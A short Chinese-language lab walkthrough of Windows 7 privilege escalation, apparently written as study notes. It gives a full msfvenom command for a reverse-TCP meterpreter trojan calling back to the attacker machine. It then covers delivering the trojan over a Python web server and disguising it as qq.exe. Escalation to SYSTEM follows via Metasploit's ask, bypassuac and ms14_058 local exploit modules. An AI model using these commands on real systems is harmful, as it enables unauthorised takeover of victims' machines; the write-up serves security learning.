环境 攻击机kali2020 ip:192.168.233.133/24
靶机 win7(32位) ip:192.168.233.132/24
权限提升方式
1提高程序运行级别
2UAC绕过
3利用本地提权漏洞进行提权
肉鸡上线,拿到用户权限
1攻击机生成木马(msf.exe)
msfVENOM -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.233.133
LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -f exe >msf.exe
2攻击机配置监听脚本
3攻击机使用python,开启简单的http server,通过web服务来传送木马
(python -m SimpleHTTPServer 888)
4win7靶机通过浏览器下载木马,并运行
5攻击机弹出meterpreter回话,查看权限是用户权限,提升到系统权限失败
二提权(提升到系统权限)
1提高程序运行级别 使用msf模块(exploit/windows/local/ask) 使用高权限来运行msf.exe
并把msf.exe伪装成qq.exe
2在靶机上点是(Y),以高权限来运行qq.exe
3靶机以高权限运行qq.exe后,在攻击机上返回新的session(session2)
4进入session2 并提权发现可以成功提到系统权限
三bypass UAC提权
1在攻击机上进入bypassuac模块,show options 查看配置
2选择低权限的会话session1 (set session 1) 后exploit,发现生成新的session3
3进入session3 (sessions -i 3)并提权,成为系统权限
四 利用本地提权漏洞进行提权
1 use exploit/windows/local/ms14_058_track_popup_menu ,进入模块后选择低权限的session
(set session 1)并运行模块,发现生成新的session 4 ,并且session 4为系统权限。
|